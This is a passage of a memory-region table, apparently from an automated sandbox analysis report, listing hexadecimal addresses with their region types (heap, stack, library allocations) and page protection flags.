heap
|
page read and write
|
||
|
6F87000
|
heap
|
page read and write
|
||
|
201E06DB000
|
heap
|
page read and write
|
||
|
201DE948000
|
heap
|
page read and write
|
||
|
201E07E8000
|
heap
|
page read and write
|
||
|
201DE9BB000
|
heap
|
page read and write
|
||
|
FFB07BE000
|
stack
|
page read and write
|
||
|
201E07ED000
|
heap
|
page read and write
|
||
|
201E0817000
|
heap
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2D2DA5000
|
trusted library allocation
|
page read and write
|
||
|
201E07E2000
|
heap
|
page read and write
|
||
|
201DE9BE000
|
heap
|
page read and write
|
||
|
201E0C28000
|
heap
|
page read and write
|
||
|
2D2D21BE000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF60000
|
trusted library allocation
|
page execute and read and write
|
||
|
201E064C000
|
heap
|
page read and write
|
||
|
201E07AA000
|
heap
|
page read and write
|
||
|
7FFE7D040000
|
trusted library allocation
|
page read and write
|
||
|
201DEB4E000
|
heap
|
page read and write
|
||
|
201E063B000
|
heap
|
page read and write
|
||
|
201E066A000
|
heap
|
page read and write
|
||
|
FFB05BF000
|
stack
|
page read and write
|
||
|
201E07E5000
|
heap
|
page read and write
|
||
|
201DE8EC000
|
heap
|
page read and write
|
||
|
201E069B000
|
heap
|
page read and write
|
||
|
FFB150B000
|
stack
|
page read and write
|
||
|
930000
|
trusted library section
|
page read and write
|
||
|
C40000
|
heap
|
page readonly
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
2D2D0D25000
|
trusted library allocation
|
page read and write
|
||
|
201E0677000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
201E066B000
|
heap
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0F0000
|
trusted library allocation
|
page read and write
|
||
|
FFB0739000
|
stack
|
page read and write
|
||
|
2D2D1233000
|
trusted library allocation
|
page read and write
|
||
|
201E0643000
|
heap
|
page read and write
|
||
|
7EA3000
|
heap
|
page read and write
|
||
|
2D2CF350000
|
heap
|
page read and write
|
||
|
7FFE7CFF0000
|
trusted library allocation
|
page read and write
|
||
|
201DE8C0000
|
heap
|
page read and write
|
||
|
5683000
|
trusted library allocation
|
page read and write
|
||
|
97A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2D0BA0000
|
heap
|
page execute and read and write
|
||
|
201E065F000
|
heap
|
page read and write
|
||
|
2D2E0CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0C0000
|
trusted library allocation
|
page read and write
|
||
|
ABDB000
|
direct allocation
|
page execute and read and write
|
||
|
7FFE7CF90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2E93E9000
|
heap
|
page read and write
|
||
|
201DEB4A000
|
heap
|
page read and write
|
||
|
2D2CF2B0000
|
trusted library allocation
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
7D40000
|
heap
|
page read and write
|
||
|
201E07AD000
|
heap
|
page read and write
|
||
|
201E0631000
|
heap
|
page read and write
|
||
|
8095000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF215000
|
heap
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2CF2A3000
|
heap
|
page read and write
|
||
|
2D2E8CA0000
|
heap
|
page read and write
|
||
|
7FFE7CDFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
201E0808000
|
heap
|
page read and write
|
||
|
2D2D2DC8000
|
trusted library allocation
|
page read and write
|
||
|
201E0C38000
|
heap
|
page read and write
|
||
|
2D2E0FAB000
|
trusted library allocation
|
page read and write
|
||
|
201E06D3000
|
heap
|
page read and write
|
||
|
445E000
|
stack
|
page read and write
|
||
|
67D000
|
stack
|
page read and write
|
||
|
7FFE7D100000
|
trusted library allocation
|
page read and write
|
||
|
678000
|
stack
|
page read and write
|
||
|
2D2E0CA1000
|
trusted library allocation
|
page read and write
|
||
|
201E07CF000
|
heap
|
page read and write
|
||
|
201E067A000
|
heap
|
page read and write
|
||
|
A24000
|
heap
|
page read and write
|
||
|
6FEF000
|
heap
|
page read and write
|
||
|
201E07A5000
|
heap
|
page read and write
|
||
|
2D2D1A2C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D120000
|
trusted library allocation
|
page read and write
|
||
|
5519000
|
trusted library allocation
|
page read and write
|
||
|
201E07C0000
|
heap
|
page read and write
|
||
|
201E07B6000
|
heap
|
page read and write
|
||
|
201E07F6000
|
heap
|
page read and write
|
||
|
7E75000
|
heap
|
page read and write
|
||
|
201E06BF000
|
heap
|
page read and write
|
||
|
7FFE7CE50000
|
trusted library allocation
|
page read and write
|
||
|
201E068E000
|
heap
|
page read and write
|
||
|
201E0808000
|
heap
|
page read and write
|
||
|
201E067F000
|
heap
|
page read and write
|
||
|
2D2D14F1000
|
trusted library allocation
|
page read and write
|
||
|
4B40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D140000
|
trusted library allocation
|
page execute and read and write
|
||
|
81F0000
|
heap
|
page read and write
|
||
|
201E0656000
|
heap
|
page read and write
|
||
|
2D2E94AA000
|
heap
|
page read and write
|
||
|
201E0638000
|
heap
|
page read and write
|
||
|
201E064B000
|
heap
|
page read and write
|
||
|
7FFE7CF87000
|
trusted library allocation
|
page read and write
|
||
|
2D2D2D92000
|
trusted library allocation
|
page read and write
|
||
|
201E0682000
|
heap
|
page read and write
|
||
|
7FFE7D000000
|
trusted library allocation
|
page read and write
|
||
|
6BC0000
|
heap
|
page read and write
|
||
|
201DE8EE000
|
heap
|
page read and write
|
||
|
7F5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
201E0706000
|
heap
|
page read and write
|
||
|
7FFE7CFB0000
|
trusted library allocation
|
page read and write
|
||
|
201E0C2D000
|
heap
|
page read and write
|
||
|
2D2E91C7000
|
heap
|
page execute and read and write
|
||
|
1F112FE000
|
stack
|
page read and write
|
||
|
201DE9B6000
|
heap
|
page read and write
|
||
|
63C000
|
stack
|
page read and write
|
||
|
201E083C000
|
heap
|
page read and write
|
||
|
960000
|
trusted library allocation
|
page read and write
|
||
|
2D2E0F9B000
|
trusted library allocation
|
page read and write
|
||
|
201E07E4000
|
heap
|
page read and write
|
||
|
201E08CC000
|
heap
|
page read and write
|
||
|
95D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CE86000
|
trusted library allocation
|
page execute and read and write
|
||
|
FFAFF5E000
|
stack
|
page read and write
|
||
|
201E068B000
|
heap
|
page read and write
|
||
|
201DEB4C000
|
heap
|
page read and write
|
||
|
2D2D2DB7000
|
trusted library allocation
|
page read and write
|
||
|
201E07F0000
|
heap
|
page read and write
|
||
|
716E000
|
stack
|
page read and write
|
||
|
201DEB4A000
|
heap
|
page read and write
|
||
|
7FFE7CF51000
|
trusted library allocation
|
page read and write
|
||
|
2D2E9224000
|
heap
|
page read and write
|
||
|
201E0649000
|
heap
|
page read and write
|
||
|
201E06F2000
|
heap
|
page read and write
|
||
|
201E0711000
|
heap
|
page read and write
|
||
|
788000
|
heap
|
page read and write
|
||
|
2D2D11AC000
|
trusted library allocation
|
page read and write
|
||
|
4C41000
|
trusted library allocation
|
page read and write
|
||
|
4551000
|
trusted library allocation
|
page read and write
|
||
|
ED0000
|
trusted library allocation
|
page read and write
|
||
|
5696000
|
trusted library allocation
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
201E0808000
|
heap
|
page read and write
|
||
|
FFB083E000
|
stack
|
page read and write
|
||
|
7D8D000
|
stack
|
page read and write
|
||
|
201E06CB000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
7060000
|
heap
|
page execute and read and write
|
||
|
201E0730000
|
heap
|
page read and write
|
||
|
201DEB45000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDC0000
|
trusted library allocation
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
2D2E91D0000
|
heap
|
page read and write
|
||
|
7FFE7D020000
|
trusted library allocation
|
page read and write
|
||
|
201E064E000
|
heap
|
page read and write
|
||
|
2D2E9226000
|
heap
|
page read and write
|
||
|
A64000
|
heap
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
2D2E93FF000
|
heap
|
page read and write
|
||
|
7FFE7CF40000
|
trusted library allocation
|
page read and write
|
||
|
2D2D0B70000
|
heap
|
page execute and read and write
|
||
|
7FFE7D010000
|
trusted library allocation
|
page read and write
|
||
|
1F10B8A000
|
stack
|
page read and write
|
||
|
43DC000
|
stack
|
page read and write
|
||
|
201E0657000
|
heap
|
page read and write
|
||
|
2D2D0B00000
|
trusted library allocation
|
page read and write
|
||
|
942296A000
|
stack
|
page read and write
|
||
|
201DE8FD000
|
heap
|
page read and write
|
||
|
2D2D27B5000
|
trusted library allocation
|
page read and write
|
||
|
7D20000
|
heap
|
page read and write
|
||
|
BFDB000
|
direct allocation
|
page execute and read and write
|
||
|
201E0696000
|
heap
|
page read and write
|
||
|
201E070B000
|
heap
|
page read and write
|
||
|
2D2D12CE000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDA4000
|
trusted library allocation
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7D090000
|
trusted library allocation
|
page read and write
|
||
|
201DEB4E000
|
heap
|
page read and write
|
||
|
4B46000
|
trusted library allocation
|
page read and write
|
||
|
2D2E94C5000
|
heap
|
page read and write
|
||
|
FFB037C000
|
stack
|
page read and write
|
||
|
A1F000
|
heap
|
page read and write
|
||
|
201E07E2000
|
heap
|
page read and write
|
||
|
8010000
|
trusted library allocation
|
page read and write
|
||
|
201E0632000
|
heap
|
page read and write
|
||
|
2D2E93D0000
|
heap
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
785000
|
heap
|
page read and write
|
||
|
950000
|
trusted library allocation
|
page read and write
|
||
|
201DE8FC000
|
heap
|
page read and write
|
||
|
FFB047E000
|
stack
|
page read and write
|
||
|
9FD000
|
heap
|
page read and write
|
||
|
1F10EFE000
|
stack
|
page read and write
|
||
|
201E0817000
|
heap
|
page read and write
|
||
|
FFAFFDE000
|
stack
|
page read and write
|
||
|
2D2CF201000
|
heap
|
page read and write
|
||
|
201E0656000
|
heap
|
page read and write
|
||
|
9BF000
|
heap
|
page read and write
|
||
|
201DE956000
|
heap
|
page read and write
|
||
|
2D2E92D0000
|
heap
|
page read and write
|
||
|
7DF4F6670000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2CF1FB000
|
heap
|
page read and write
|
||
|
201E0667000
|
heap
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
1F113FF000
|
stack
|
page read and write
|
||
|
44E8000
|
heap
|
page read and write
|
||
|
2D2D0BC5000
|
heap
|
page read and write
|
||
|
9B3000
|
heap
|
page read and write
|
||
|
FFB0577000
|
stack
|
page read and write
|
||
|
201E06BA000
|
heap
|
page read and write
|
||
|
2D2E9448000
|
heap
|
page read and write
|
||
|
201E0656000
|
heap
|
page read and write
|
||
|
201DE9A2000
|
heap
|
page read and write
|
||
|
201DE8E9000
|
heap
|
page read and write
|
||
|
1F10FFE000
|
stack
|
page read and write
|
||
|
94229EF000
|
unkown
|
page read and write
|
||
|
201E0635000
|
heap
|
page read and write
|
||
|
201E07B4000
|
heap
|
page read and write
|
||
|
83A0000
|
direct allocation
|
page read and write
|
||
|
201E0662000
|
heap
|
page read and write
|
||
|
1F114FD000
|
stack
|
page read and write
|
||
|
2D2D25CF000
|
trusted library allocation
|
page read and write
|
||
|
954000
|
trusted library allocation
|
page read and write
|
||
|
FFB027E000
|
stack
|
page read and write
|
||
|
C7B000
|
heap
|
page read and write
|
||
|
2D2D139E000
|
trusted library allocation
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF5A000
|
trusted library allocation
|
page read and write
|
||
|
FFB09BB000
|
stack
|
page read and write
|
||
|
2D2CF203000
|
heap
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page read and write
|
||
|
201E0800000
|
heap
|
page read and write
|
||
|
1F111FF000
|
stack
|
page read and write
|
||
|
201E0656000
|
heap
|
page read and write
|
||
|
2D2E949F000
|
heap
|
page read and write
|
||
|
201E0630000
|
heap
|
page read and write
|
||
|
FFB140E000
|
stack
|
page read and write
|
||
|
201E0703000
|
heap
|
page read and write
|
||
|
201E07D8000
|
heap
|
page read and write
|
||
|
201E0640000
|
heap
|
page read and write
|
||
|
686E000
|
stack
|
page read and write
|
||
|
7E15000
|
heap
|
page read and write
|
||
|
2D2CF1BD000
|
heap
|
page read and write
|
||
|
201DEB4A000
|
heap
|
page read and write
|
||
|
7FFE7D0B0000
|
trusted library allocation
|
page read and write
|
||
|
201E064C000
|
heap
|
page read and write
|
||
|
201DE948000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
201E07E2000
|
heap
|
page read and write
|
||
|
201E0808000
|
heap
|
page read and write
|
||
|
C15000
|
trusted library allocation
|
page execute and read and write
|
||
|
201DE8EA000
|
heap
|
page read and write
|
||
|
201E065A000
|
heap
|
page read and write
|
||
|
201E06AA000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
6F52000
|
heap
|
page read and write
|
||
|
263F3260000
|
heap
|
page read and write
|
||
|
7FFE7CDA0000
|
trusted library allocation
|
page read and write
|
||
|
201DE9B6000
|
heap
|
page read and write
|
||
|
696E000
|
stack
|
page read and write
|
||
|
2D2E91C0000
|
heap
|
page execute and read and write
|
||
|
201E0657000
|
heap
|
page read and write
|
||
|
C10000
|
trusted library allocation
|
page read and write
|
||
|
201E07F4000
|
heap
|
page read and write
|
||
|
201E0817000
|
heap
|
page read and write
|
||
|
732B000
|
stack
|
page read and write
|
||
|
201E069E000
|
heap
|
page read and write
|
||
|
201E0631000
|
heap
|
page read and write
|
||
|
EBE000
|
stack
|
page read and write
|
||
|
7E5B000
|
heap
|
page read and write
|
||
|
201E06C2000
|
heap
|
page read and write
|
||
|
2D2CF355000
|
heap
|
page read and write
|
||
|
201DE790000
|
heap
|
page read and write
|
||
|
7DCE000
|
stack
|
page read and write
|
||
|
201E06E3000
|
heap
|
page read and write
|
||
|
2D2D0C90000
|
heap
|
page read and write
|
||
|
81AC000
|
stack
|
page read and write
|
||
|
201E07E9000
|
heap
|
page read and write
|
||
|
201E06D6000
|
heap
|
page read and write
|
||
|
8390000
|
direct allocation
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
7FFE7CF82000
|
trusted library allocation
|
page read and write
|
||
|
2D2E0F8D000
|
trusted library allocation
|
page read and write
|
||
|
263F3269000
|
heap
|
page read and write
|
||
|
81EB000
|
stack
|
page read and write
|
||
|
8350000
|
trusted library allocation
|
page read and write
|
||
|
2D2D11B7000
|
trusted library allocation
|
page read and write
|
||
|
6FC4000
|
heap
|
page read and write
|
||
|
7FFE7D0E0000
|
trusted library allocation
|
page read and write
|
||
|
201E0672000
|
heap
|
page read and write
|
||
|
7FFE7CE56000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF110000
|
heap
|
page read and write
|
||
|
A7C000
|
heap
|
page read and write
|
||
|
FFB0637000
|
stack
|
page read and write
|
||
|
2D2CF2E0000
|
heap
|
page readonly
|
||
|
82C0000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF130000
|
heap
|
page read and write
|
||
|
2D2D25EA000
|
trusted library allocation
|
page read and write
|
||
|
C30000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDBB000
|
trusted library allocation
|
page read and write
|
||
|
6F40000
|
heap
|
page read and write
|
||
|
7FFE7CDA2000
|
trusted library allocation
|
page read and write
|
||
|
920000
|
trusted library section
|
page read and write
|
||
|
FFAFED3000
|
stack
|
page read and write
|
||
|
201E06EB000
|
heap
|
page read and write
|
||
|
C58000
|
trusted library allocation
|
page read and write
|
||
|
44E0000
|
heap
|
page read and write
|
||
|
201E06AF000
|
heap
|
page read and write
|
||
|
7FFE7CDA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
6DEE000
|
stack
|
page read and write
|
||
|
2D2E92F0000
|
heap
|
page read and write
|
||
|
263F3200000
|
heap
|
page read and write
|
||
|
7FFE7CDAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
FFB08BE000
|
stack
|
page read and write
|
||
|
2D2CF243000
|
heap
|
page read and write
|
||
|
201E07FB000
|
heap
|
page read and write
|
||
|
7E65000
|
heap
|
page read and write
|
||
|
2D2D1A0B000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF2F0000
|
trusted library allocation
|
page read and write
|
||
|
263F31E0000
|
heap
|
page read and write
|
||
|
201E06DE000
|
heap
|
page read and write
|
||
|
2D2E92BA000
|
heap
|
page read and write
|
||
|
FFB158B000
|
stack
|
page read and write
|
||
|
201E06B2000
|
heap
|
page read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
||
|
2D2CF030000
|
heap
|
page read and write
|
||
|
201E0706000
|
heap
|
page read and write
|
||
|
2D2CF1FF000
|
heap
|
page read and write
|
||
|
2D2E92A2000
|
heap
|
page read and write
|
||
|
44D0000
|
heap
|
page execute and read and write
|
||
|
2D2CF1B0000
|
heap
|
page read and write
|
||
|
2D2D2102000
|
trusted library allocation
|
page read and write
|
||
|
263F31D0000
|
heap
|
page read and write
|
||
|
201E07A7000
|
heap
|
page read and write
|
||
|
5557000
|
trusted library allocation
|
page read and write
|
||
|
6F98000
|
heap
|
page read and write
|
||
|
201E07E2000
|
heap
|
page read and write
|
||
|
201E0C2A000
|
heap
|
page read and write
|
||
|
201E08CB000
|
heap
|
page read and write
|
||
|
2D2D277A000
|
trusted library allocation
|
page read and write
|
||
|
201E06E6000
|
heap
|
page read and write
|
||
|
201E0641000
|
heap
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
201E0655000
|
heap
|
page read and write
|
||
|
201E07CC000
|
heap
|
page read and write
|
||
|
8000000
|
trusted library allocation
|
page read and write
|
||
|
44A5000
|
heap
|
page execute and read and write
|
||
|
201DE870000
|
heap
|
page read and write
|
||
|
201E0C20000
|
heap
|
page read and write
|
||
|
44F1000
|
trusted library allocation
|
page read and write
|
||
|
201DEB10000
|
heap
|
page read and write
|
||
|
FFB06B9000
|
stack
|
page read and write
|
||
|
7FFE7D080000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFD0000
|
trusted library allocation
|
page read and write
|
||
|
54F1000
|
trusted library allocation
|
page read and write
|
||
|
201E0656000
|
heap
|
page read and write
|
||
|
2D2CF2D0000
|
trusted library allocation
|
page read and write
|
||
|
2D2D0CA1000
|
trusted library allocation
|
page read and write
|
||
|
FFB03FE000
|
stack
|
page read and write
|
||
|
4647000
|
trusted library allocation
|
page read and write
|
||
|
6BD0000
|
heap
|
page read and write
|
||
|
7FFE7D070000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
449E000
|
stack
|
page read and write
|
||
|
201E06EF000
|
heap
|
page read and write
|
||
|
FFB02FE000
|
stack
|
page read and write
|
||
|
2D2D11EF000
|
trusted library allocation
|
page read and write
|
||
|
2D2E949B000
|
heap
|
page read and write
|
||
|
2D2D0BC7000
|
heap
|
page read and write
|
||
|
7FFE7D130000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
A1DB000
|
direct allocation
|
page execute and read and write
|
There are 508 hidden memdumps, click here to show them.